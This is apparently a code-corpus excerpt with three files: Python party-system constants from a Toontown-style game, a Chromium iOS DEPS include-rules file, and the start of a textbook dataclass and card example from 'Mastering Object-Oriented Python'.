137.0 / 255.0,
52.0 / 255.0,
1.0)}
PartyGridUnitLength = [14.4, 14.6]
PartyGridHeadingConverter = 15.0
PartyGridToPandaOffset = (-PartyGridUnitLength[0] * PartyEditorGridSize[0] / 2.0, -PartyGridUnitLength[1] * PartyEditorGridSize[1] / 2.0)
PartyCostMultiplier = 1
MinimumPartyCost = 100 * PartyCostMultiplier
ActivityInformationDict = {ActivityIds.PartyJukebox: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyJukebox_activity_1x1'},
ActivityIds.PartyJukebox40: {'cost': int(100 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyJukebox_activity_1x1'},
ActivityIds.PartyValentineJukebox: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyJukebox_activity_1x1'},
ActivityIds.PartyValentineJukebox40: {'cost': int(100 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyJukebox_activity_1x1'},
ActivityIds.PartyCannon: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 5,
'limitPerParty': 10,
'paidOnly': False,
'gridAsset': 'PartyCannon_activity_1x1'},
ActivityIds.PartyTrampoline: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 8,
'paidOnly': False,
'gridAsset': 'PartyTrampoline_activity_2x2'},
ActivityIds.PartyValentineTrampoline: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 8,
'paidOnly': False,
'gridAsset': 'PartyTrampoline_activity_2x2'},
ActivityIds.PartyVictoryTrampoline: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 8,
'paidOnly': False,
'gridAsset': 'PartyTrampoline_activity_2x2'},
ActivityIds.PartyWinterTrampoline: {'cost': int(50 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 8,
'paidOnly': False,
'gridAsset': 'PartyTrampoline_activity_2x2'},
ActivityIds.PartyCatch: {'cost': int(300 * PartyCostMultiplier),
'gridsize': (5, 5),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyCatch_activity_5x5'},
ActivityIds.PartyWinterCatch: {'cost': int(300 * PartyCostMultiplier),
'gridsize': (5, 5),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyCatch_activity_5x5'},
ActivityIds.PartyCog: {'cost': int(300 * PartyCostMultiplier),
'gridsize': (5, 5),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyCog_activity_5x5'},
ActivityIds.PartyWinterCog: {'cost': int(300 * PartyCostMultiplier),
'gridsize': (5, 5),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyCog_activity_5x5'},
ActivityIds.PartyDance: {'cost': int(100 * PartyCostMultiplier),
'gridsize': (3, 3),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyDance_activity_3x3'},
ActivityIds.PartyDance20: {'cost': int(200 * PartyCostMultiplier),
'gridsize': (3, 3),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyDance_activity_3x3'},
ActivityIds.PartyValentineDance: {'cost': int(100 * PartyCostMultiplier),
'gridsize': (3, 3),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyDance_activity_3x3'},
ActivityIds.PartyValentineDance20: {'cost': int(200 * PartyCostMultiplier),
'gridsize': (3, 3),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': True,
'gridAsset': 'PartyDance_activity_3x3'},
ActivityIds.PartyTugOfWar: {'cost': int(200 * PartyCostMultiplier),
'gridsize': (4, 4),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyTufOfWar_activity_4x4'},
ActivityIds.PartyFireworks: {'cost': int(200 * PartyCostMultiplier),
'gridsize': (4, 2),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyFireworks_activity_2x4'},
ActivityIds.PartyClock: {'cost': MinimumPartyCost,
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 1,
'paidOnly': False,
'gridAsset': 'PartyClock_activity_1x1'}}
DecorationInformationDict = {DecorationIds.BalloonAnvil: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.BalloonAnvilValentine: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.BalloonStage: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Bow: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Cake: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Castle: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.GiftPile: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Horn: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.MardiGras: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.NoiseMakers: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Pinwheel: {'cost': int(10 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.GagGlobe: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.BannerJellyBean: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.CakeTower: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.HeartTarget: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.HeartBanner: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.FlyingHeart: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.Hydra: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_propStage_2x2'},
DecorationIds.BannerVictory: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.CannonVictory: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.CogStatueVictory: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.TubeCogVictory: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.CogIceCreamVictory: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.cogIceCreamWinter: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.StageWinter: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (2, 2),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_propStage_2x2'},
DecorationIds.CogStatueWinter: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.snowman: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'},
DecorationIds.snowDoodle: {'cost': int(25 * PartyCostMultiplier),
'gridsize': (1, 1),
'numberPerPurchase': 1,
'limitPerParty': 5,
'paidOnly': False,
'gridAsset': 'decoration_1x1'}}
DefaultRulesTimeout = 10.0
DenialReasons = IntEnum('DenialReasons', ('Default', 'Full', 'SilentFail'), start=0)
FireworkShows = IntEnum('FireworkShows', ('Summer',), start=200)
FireworksGlobalXOffset = 160.0
FireworksGlobalYOffset = -20.0
FireworksPostLaunchDelay = 5.0
RocketSoundDelay = 2.0
RocketDirectionDelay = 2.0
FireworksStartedEvent = 'PartyFireworksStarted'
FireworksFinishedEvent = 'PartyFireworksFinished'
FireworksTransitionToDisabledDelay = 3.0
TeamActivityTeams = IntEnum('TeamActivityTeams', ('LeftTeam', 'RightTeam'), start=0)
TeamActivityNeitherTeam = 3
TeamActivityTextScale = 0.135
TeamActivityStartDelay = 8.0
TeamActivityClientWaitDelay = 30.0
TeamActivityDefaultMinPlayersPerTeam = 1
TeamActivityDefaultMaxPlayersPerTeam = 4
TeamActivityDefaultDuration = 60.0
TeamActivityDefaultConclusionDuration = 4.0
TeamActivityStatusColor = VBase4(1.0, 1.0, 0.65, 1.0)
CogActivityBalanceTeams = True
CogActivityStartDelay = 15.0
CogActivityConclusionDuration = 12
CogActivityDuration = 90
CogActivityMinPlayersPerTeam = 1
CogActivityMaxPlayersPerTeam = 4
CogActivityColors = (VBase4(0.22, 0.4, 0.98, 1.0), VBase4(1.0, 0.43, 0.04, 1.0))
CogActivitySplatColorBase = VBase4(0.98, 0.9, 0.094, 1.0)
CogActivitySplatColors = (VBase4(CogActivityColors[0][0] / CogActivitySplatColorBase[0], CogActivityColors[0][1] / CogActivitySplatColorBase[1], CogActivityColors[0][2] / CogActivitySplatColorBase[2], 1.0), VBase4(CogActivityColors[1][0] / CogActivitySplatColorBase[0], CogActivityColors[1][1] / CogActivitySplatColorBase[1], CogActivityColors[1][2] / CogActivitySplatColorBase[2], 1.0))
CogPinataHeadZ = 4.7
CogActivityHitPoints = 1
CogActivityHitPointsForHead = 3
CogPinataPushBodyFactor = 0.05
CogPinataPushHeadFactor = CogPinataPushBodyFactor * abs(CogActivityHitPointsForHead - CogActivityHitPoints)
CogActivityAvgBeansPerSecond = 0.15
CogActivityBeansToAward = round(CogActivityAvgBeansPerSecond * CogActivityDuration * 2.0)
CogActivityWinBeans = int(round(CogActivityBeansToAward * 0.6))
CogActivityLossBeans = int(round(CogActivityBeansToAward * 0.4))
CogActivityTieBeans = int(round(CogActivityBeansToAward * 0.4))
CogActivityPerfectWinBeans = int(round(CogActivityBeansToAward * 0.75))
CogActivityPerfectLossBeans = int(round(CogActivityBeansToAward * 0.25))
CogActivityArenaLength = 50.0
CogActivityPieMinDist = 0.0
CogActivityPieMaxDist = 110.0
CogActivityPowerMeterHeight = 0.4
CogActivityPowerMeterWidth = 0.1
CogActivityPowerMeterPos = (0.33, 0.0, 0.0)
CogActivityPowerMeterTextPos = (0.33, -0.26)
CogActivityVictoryBarPos = (-0.55, 0.0, 0.825)
CogActivityVictoryBarOrangePos = (0.1725, 0.0, -0.0325)
CogActivityVictoryBarPiePos = (0.47, 0.0, -0.015)
CogActivityVictoryBarArrow = (0.0, 0.0, 0.1)
CogActivityBarUnitScale = 1.1
CogActivityBarStartScale = CogActivityBarUnitScale * 5
CogActivityBarPieUnitMove = 0.07
CogActivityBarPieScale = 1.5
CogActivityScorePos = (1.25, -0.45)
CogActivityScoreTitle = (1.24, -0.5)
CogActivityPowerMeterTime = 1.0
CogActivityShortThrowTime = 0.1
ToonAttackIdleThreshold = 5.0
ToonMoveIdleThreshold = 5.0
CogActivityShortThrowSpam = 3
CogActivitySpamWarningShowTime = 5.0
CogActivityControlsShowTime = 2.0
PARTY_COG_CUTOFF = 60
TugOfWarStartDelay = 8.0
TugOfWarReadyDuration = 1.5
TugOfWarGoDuration = 0.75
TugOfWarDuration = 40.0
TugOfWarMinimumPlayersPerTeam = 1
TugOfWarMaximumPlayersPerTeam = 4
TugOfWarStartGameTimeout = 8
TugOfWarJoinCollisionEndPoints = [Point3(6.0, 0.0, 0.0), Point3(-6.0, 0.0, 0.0)]
TugOfWarJoinCollisionRadius = 1.75
TugOfWarJoinCollisionPositions = [Point3(-10.5, 0.25, 4.5), Point3(10.5, -0.25, 4.5)]
TugOfWarInitialToonPositionsXOffset = 8.0
TugOfWarToonPositionXSeparation = 2.0
TugOfWarToonPositionZ = 2.55
TugOfWarTextWordScale = 0.135
TugOfWarTextCountdownScale = 4.0
TugOfWarCameraPos = Point3(0.0, -33.0, 10.0)
TugOfWarCameraInitialHpr = Point3(0.0, -6.91123, 0.0)
TugOfWarCameraLookAtHeightOffset = 6.0
TugOfWarPowerMeterSize = 17
TugOfWarPowerMeterRulesTarget = 8
TugOfWarDisabledArrowColor = VBase4(1.0, 0.0, 0.0, 0.3)
TugOfWarEnabledArrowColor = VBase4(1.0, 0.0, 0.0, 1.0)
TugOfWarHilightedArrowColor = VBase4(1.0, 0.7, 0.0, 1.0)
TugOfWarTargetRateList = [(8.0, 6),
(5.0, 7),
(6.0, 8),
(6.0, 10),
(7.0, 11),
(8.0, 12)]
TugOfWarKeyPressTimeToLive = 1.0
TugOfWarKeyPressUpdateRate = 0.1
TugOfWarKeyPressReportRate = 0.2
TugOfWarMovementFactor = 0.03
TugOfWarSplashZOffset = 1.0
TugOfWarHeadings = [240.0, 120.0]
TugOfWarConclusionDuration = 4.0
TugOfWarFallInWinReward = 15
TugOfWarFallInLossReward = 4
TugOfWarWinReward = 12
TugOfWarLossReward = 8
TugOfWarTieReward = 5
TugOfWarTieThreshold = 0.75
TrampolineDuration = 60.0
TrampolineSignOffset = Point3(-6.0, -6.0, 0.0)
TrampolineLeverOffset = Point3(-5.0, -9.0, 0.0)
TrampolineNumJellyBeans = 12
TrampolineJellyBeanBonus = 10
CatchActivityDuration = 80
CatchActivityBitmask = BitMask32(16)
CatchLeverOffset = Point3(-3.0, -2.0, 0.0)
CatchDropShadowHeight = 0.5
CatchConclusionDuration = 3.0
class DropObject:
def __init__(self, name, good, onscreenDurMult, modelPath):
self.name = name
self.good = good
self.onscreenDurMult = onscreenDurMult
self.modelPath = modelPath
def isBaseline(self):
return self.onscreenDurMult == 1.0
DropObjectTypes = [DropObject('apple', 1, 1.0, 'phase_4/models/minigames/apple'),
DropObject('orange', 1, 1.0, 'phase_4/models/minigames/orange'),
DropObject('pear', 1, 1.0, 'phase_4/models/minigames/pear'),
DropObject('coconut', 1, 1.0, 'phase_4/models/minigames/coconut'),
DropObject('watermelon', 1, 1.0, 'phase_4/models/minigames/watermelon'),
DropObject('pineapple', 1, 1.0, 'phase_4/models/minigames/pineapple'),
DropObject('anvil', 0, 0.4, 'phase_4/models/props/anvil-mod')]
Name2DropObjectType = {}
for type in DropObjectTypes:
Name2DropObjectType[type.name] = type
Name2DOTypeId = {}
names = list(Name2DropObjectType.keys())
names.sort()
for i in range(len(names)):
Name2DOTypeId[names[i]] = i
DOTypeId2Name = names
NumFruits = [{2000: 18,
1000: 19,
5000: 22,
4000: 24,
3000: 27,
9000: 28},
{2000: 30,
1000: 33,
5000: 38,
4000: 42,
3000: 46,
9000: 50},
{2000: 42,
1000: 48,
5000: 54,
4000: 60,
3000: 66,
9000: 71},
{2000: 56,
1000: 63,
5000: 70,
4000: 78,
3000: 85,
9000: 92}]
DancePatternToAnims = {'dduu': 'slip-backward',
'ldddud': 'happy-dance',
'lll': 'left',
'rdu': 'struggle',
'rrr': 'right',
'rulu': 'running-jump',
'udlr': 'good-putt',
'udllrr': 'victory',
'ulu': 'jump',
'uudd': 'slip-forward'}
DancePatternToAnims20 = {'ddd': 'down',
'dduu': 'slip-backward',
'drul': 'sad-walk',
'ldr': 'push',
'ldddud': 'happy-dance',
'ldu': 'sprinkle-dust',
'lll': 'left',
'llrr': 'firehose',
'lrlr': 'wave',
'rdu': 'struggle',
'rlrl': 'confused',
'rrr': 'right',
'rulu': 'running-jump',
'uddd': 'reel-neutral',
'udlr': 'good-putt',
'udud': 'angry',
'udllrr': 'victory',
'ulu': 'jump',
'uudd': 'slip-forward',
'uuu': 'up'}
DanceAnimToName = {'right': TTLocalizer.DanceAnimRight,
'reel-neutral': TTLocalizer.DanceAnimReelNeutral,
'conked': TTLocalizer.DanceAnimConked,
'happy-dance': TTLocalizer.DanceAnimHappyDance,
'confused': TTLocalizer.DanceAnimConfused,
'walk': TTLocalizer.DanceAnimWalk,
'jump': TTLocalizer.DanceAnimJump,
'firehose': TTLocalizer.DanceAnimFirehose,
'shrug': TTLocalizer.DanceAnimShrug,
'slip-forward': TTLocalizer.DanceAnimSlipForward,
'sad-walk': TTLocalizer.DanceAnimSadWalk,
'wave': TTLocalizer.DanceAnimWave,
'struggle': TTLocalizer.DanceAnimStruggle,
'running-jump': TTLocalizer.DanceAnimRunningJump,
'slip-backward': TTLocalizer.DanceAnimSlipBackward,
'down': TTLocalizer.DanceAnimDown,
'up': TTLocalizer.DanceAnimUp,
'good-putt': TTLocalizer.DanceAnimGoodPutt,
'victory': TTLocalizer.DanceAnimVictory,
'push': TTLocalizer.DanceAnimPush,
'angry': TTLocalizer.DanceAnimAngry,
'left': TTLocalizer.DanceAnimLeft}
DanceReverseLoopAnims = ['left',
'right',
'up',
'down',
'good-putt']
ToonDancingStates = IntEnum('ToonDancingStates', ('Init',
'DanceMove',
'Run',
'Cleanup'), start=0)
JUKEBOX_TIMEOUT = 30.0
MUSIC_PATH = 'phase_%s/audio/bgm/'
MUSIC_MIN_LENGTH_SECONDS = 50.0
MUSIC_GAP = 2.5
PhaseToMusicData = {3.5: {'TC_SZ.ogg': [TTLocalizer.MusicTcSz, 57]},
3: {'create_a_toon.ogg': [TTLocalizer.MusicCreateAToon, 175],
'tt_theme.ogg': [TTLocalizer.MusicTtTheme, 51]},
4: {'TC_nbrhood.ogg': [TTLocalizer.MusicTcNbrhood, 59],
'MG_TwoDGame.ogg': [TTLocalizer.MusicMgTwodgame, 60],
'MG_Vine.ogg': [TTLocalizer.MusicMgVine, 32],
'FF_safezone.ogg': [TTLocalizer.MusicFfSafezone, 47]},
6: {'DD_SZ.ogg': [TTLocalizer.MusicDdSz, 33],
'GS_SZ.ogg': [TTLocalizer.MusicGsSz, 60],
'OZ_SZ.ogg': [TTLocalizer.MusicOzSz, 31],
'GZ_SZ.ogg': [TTLocalizer.MusicGzSz, 59],
'MM_SZ.ogg': [TTLocalizer.MusicMmSz, 76]},
8: {'DG_SZ.ogg': [TTLocalizer.MusicDgSz, 48],
'DL_SZ.ogg': [TTLocalizer.MusicDlSz, 33],
'TB_SZ.ogg': [TTLocalizer.MusicTbSz, 54]},
9: {'encntr_hall_of_fame.ogg': [TTLocalizer.MusicEncntrHallOfFame, 51],
'encntr_head_suit_theme.ogg': [TTLocalizer.MusicEncntrHeadSuitTheme, 29]},
11: {'LB_juryBG.ogg': [TTLocalizer.MusicLbJurybg, 30]},
13: {'party_original_theme.ogg': [TTLocalizer.MusicPartyOriginalTheme, 56],
'party_generic_theme_jazzy.ogg': [TTLocalizer.MusicPartyGenericThemeJazzy, 64]}}
PhaseToMusicData40 = {3.5: {'encntr_general_bg.ogg': [TTLocalizer.MusicEncntrGeneralBg, 30],
'TC_SZ.ogg': [TTLocalizer.MusicTcSz, 57]},
3: {'create_a_toon.ogg': [TTLocalizer.MusicCreateAToon, 175],
'tt_theme.ogg': [TTLocalizer.MusicTtTheme, 51]},
4: {'minigame_race.ogg': [TTLocalizer.MusicMinigameRace, 77],
'TC_nbrhood.ogg': [TTLocalizer.MusicTcNbrhood, 59],
'MG_TwoDGame.ogg': [TTLocalizer.MusicMgTwodgame, 60],
'MG_CogThief.ogg': [TTLocalizer.MusicMgCogthief, 61],
'MG_Vine.ogg': [TTLocalizer.MusicMgVine, 32],
'MG_IceGame.ogg': [TTLocalizer.MusicMgIcegame, 56],
'FF_safezone.ogg': [TTLocalizer.MusicFfSafezone, 47]},
6: {'DD_SZ.ogg': [TTLocalizer.MusicDdSz, 33],
'GZ_PlayGolf.ogg': [TTLocalizer.MusicGzPlaygolf, 61],
'GS_SZ.ogg': [TTLocalizer.MusicGsSz, 60],
'OZ_SZ.ogg': [TTLocalizer.MusicOzSz, 31],
'GS_Race_CC.ogg': [TTLocalizer.MusicGsRaceCc, 58],
'GS_Race_SS.ogg': [TTLocalizer.MusicGsRaceSs, 61],
'GS_Race_RR.ogg': [TTLocalizer.MusicGsRaceRr, 60],
'GZ_SZ.ogg': [TTLocalizer.MusicGzSz, 59],
'MM_SZ.ogg': [TTLocalizer.MusicMmSz, 76],
'DD_nbrhood.ogg': [TTLocalizer.MusicDdNbrhood, 67],
'GS_KartShop.ogg': [TTLocalizer.MusicGsKartshop, 32]},
7: {'encntr_general_bg_indoor.ogg': [TTLocalizer.MusicEncntrGeneralBgIndoor, 31],
'encntr_suit_winning_indoor.ogg': [TTLocalizer.MusicEncntrGeneralSuitWinningIndoor, 36]},
8: {'DL_nbrhood.ogg': [TTLocalizer.MusicDlNbrhood, 30],
'DG_SZ.ogg': [TTLocalizer.MusicDgSz, 48],
'DL_SZ.ogg': [TTLocalizer.MusicDlSz, 33],
'TB_SZ.ogg': [TTLocalizer.MusicTbSz, 54]},
9: {'encntr_hall_of_fame.ogg': [TTLocalizer.MusicEncntrHallOfFame, 51],
'CHQ_FACT_bg.ogg': [TTLocalizer.MusicChqFactBg, 50],
'encntr_suit_winning.ogg': [TTLocalizer.MusicEncntrSuitWinning, 31],
'encntr_head_suit_theme.ogg': [TTLocalizer.MusicEncntrHeadSuitTheme, 29]},
11: {'LB_juryBG.ogg': [TTLocalizer.MusicLbJurybg, 30],
'LB_courtyard.ogg': [TTLocalizer.MusicLbCourtyard, 32]},
12: {'Bossbot_Factory_v1.ogg': [TTLocalizer.MusicBossbotFactoryV1, 30],
'BossBot_CEO_v1.ogg': [TTLocalizer.MusicBossbotCeoV1, 31]},
13: {'party_original_theme.ogg': [TTLocalizer.MusicPartyOriginalTheme, 56],
'party_polka_dance.ogg': [TTLocalizer.MusicPartyPolkaDance, 63],
'party_waltz_dance.ogg': [TTLocalizer.MusicPartyWaltzDance, 63],
'party_generic_theme_jazzy.ogg': [TTLocalizer.MusicPartyGenericThemeJazzy, 64]}}
def countMusic():
numMusic = 0
for key in PhaseToMusicData:
numMusic += len(PhaseToMusicData[key])
print('PhaseToMusicData %d' % numMusic)
numMusic = 0
for key in PhaseToMusicData40:
numMusic += len(PhaseToMusicData40[key])
print('PhaseToMusicData40 %d' % numMusic)
def getMusicRepeatTimes(length, minLength = MUSIC_MIN_LENGTH_SECONDS):
times = round(float(minLength) / length)
if minLength <= 0 or times < 1.0:
times = 1.0
return times
def sanitizePhase(phase):
if phase == int(phase):
phase = int(phase)
return phase
CANNON_TIMEOUT = 30
CANNON_MOVIE_LOAD = 1
CANNON_MOVIE_CLEAR = 2
CANNON_MOVIE_FORCE_EXIT = 3
CANNON_MOVIE_LANDED = 4
CannonJellyBeanReward = 2
CannonMaxTotalReward = 200
CatchMaxTotalReward = 1000
PartyCannonCollisions = {'clouds': ['cloudSphere-0'],
'bounce': ['wall_collision',
'discoBall_collision',
'platform_left_collision',
'platform_right_collision'],
'trampoline_bounce': 'TrampolineCollision',
'ground': ['floor_collision',
'danceFloor_collision',
'danceFloorRamp_collision',
'hill_collision',
'fence_floor'],
'fence': ['dockTube1_collision',
'dockTube2_collision',
'dockTube2_collision',
'dockTube2_collision',
'palm_collision_01',
'palm_collision_02',
'palm_collision_03',
'wall_1_collision',
'wall_2_collision',
'wall_3_collision',
'wall_4_collision',
'wall_5_collision',
'wall_6_collision',
'tree_collision',
'partyDecoration_collision',
'launchPad_railing_collision',
'launchPad_floor_collision',
'launchPad_collision',
'launchPad_railing2_collision',
'launchPad__rocket_collision',
'launchPad_lever_collision',
'launchPad_bridge_collision',
'launchPad_sphere2_collision',
'launchPad_sphere1_collision',
'partyClock_collision',
'sign_collision']}
def getCostOfParty(partyInfo):
newCost = 0
for activityBase in partyInfo.activityList:
newCost += ActivityInformationDict[activityBase.activityId]['cost']
for decorBase in partyInfo.decors:
newCost += DecorationInformationDict[decorBase.decorId]['cost']
return newCost
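# Hedged sketch (illustrative, not part of the game source): getMusicRepeatTimes
# above returns how many plays of a track are needed to fill roughly
# MUSIC_MIN_LENGTH_SECONDS (50 s), clamping to at least one play.
#     getMusicRepeatTimes(32.0)   # round(50.0 / 32.0) == 2 plays
#     getMusicRepeatTimes(120.0)  # round(50.0 / 120.0) == 0, clamped to 1.0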
|
9b8754f2862c1046bf8a9479648d1b81ffc13f26
|
0577a46d8d28e1fd8636893bbdd2b18270bb8eb8
|
/chromium/ios/chrome/browser/ui/side_swipe/DEPS
|
94d0c0ba70e7d298ab32e0bc249a4cbd107e596a
|
[
"BSD-3-Clause"
] |
permissive
|
ric2b/Vivaldi-browser
|
388a328b4cb838a4c3822357a5529642f86316a5
|
87244f4ee50062e59667bf8b9ca4d5291b6818d7
|
refs/heads/master
| 2022-12-21T04:44:13.804535
| 2022-12-17T16:30:35
| 2022-12-17T16:30:35
| 86,637,416
| 166
| 41
|
BSD-3-Clause
| 2021-03-31T18:49:30
| 2017-03-29T23:09:05
| null |
UTF-8
|
Python
| false
| false
| 180
|
DEPS
|
specific_include_rules = {
# TODO(crbug.com/620932): Remove this exception.
"^side_swipe_controller\.h$": [
"+ios/web/web_state/ui/crw_swipe_recognizer_provider.h",
],
}
|
|
a02e93929a2f8751ff07ab3367c6ff71467a2446
|
1334dae619b127bedb8c7a2587021b6be596a1f5
|
/Chapter_4/ch04_ex5.py
|
9752b2f095ab4eb4b129cba0dafaff850108967c
|
[
"MIT"
] |
permissive
|
PacktPublishing/Mastering-Object-Oriented-Python-Second-Edition
|
236a04c7f0b72bb2350d44e1cb3bfb7d2067179b
|
f6d6517952d51e75c5e086f4c19d1e52500cf261
|
refs/heads/master
| 2023-02-02T06:33:49.821872
| 2023-01-30T08:50:52
| 2023-01-30T08:50:52
| 187,621,576
| 139
| 103
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,866
|
py
|
ch04_ex5.py
|
#!/usr/bin/env python3.7
"""
Mastering Object-Oriented Python 2e
Code Examples for Mastering Object-Oriented Python 2nd Edition
Chapter 4. Example 5.
"""
from dataclasses import dataclass
from enum import Enum
from typing import Iterator, cast, Iterable, Optional
@dataclass
class RTD:
rate: Optional[float]
time: Optional[float]
distance: Optional[float]
def compute(self) -> "RTD":
if (
self.distance is None and self.rate is not None and self.time is not None
):
self.distance = self.rate * self.time
elif (
self.rate is None and self.distance is not None and self.time is not None
):
self.rate = self.distance / self.time
elif (
self.time is None and self.distance is not None and self.rate is not None
):
self.time = self.distance / self.rate
return self
test_rtd = """
>>> r = RTD(distance=13.5, rate=6.1, time=None)
>>> r.compute()
RTD(rate=6.1, time=2.2131147540983607, distance=13.5)
"""
class Suit(str, Enum):
Club = "\N{BLACK CLUB SUIT}"
Diamond = "\N{BLACK DIAMOND SUIT}"
Heart = "\N{BLACK HEART SUIT}"
Spade = "\N{BLACK SPADE SUIT}"
@dataclass(frozen=True, order=True)
class Card:
rank: int
suit: str
@property
def points(self) -> int:
return self.rank
class Ace(Card):
@property
def points(self) -> int:
return 1
class Face(Card):
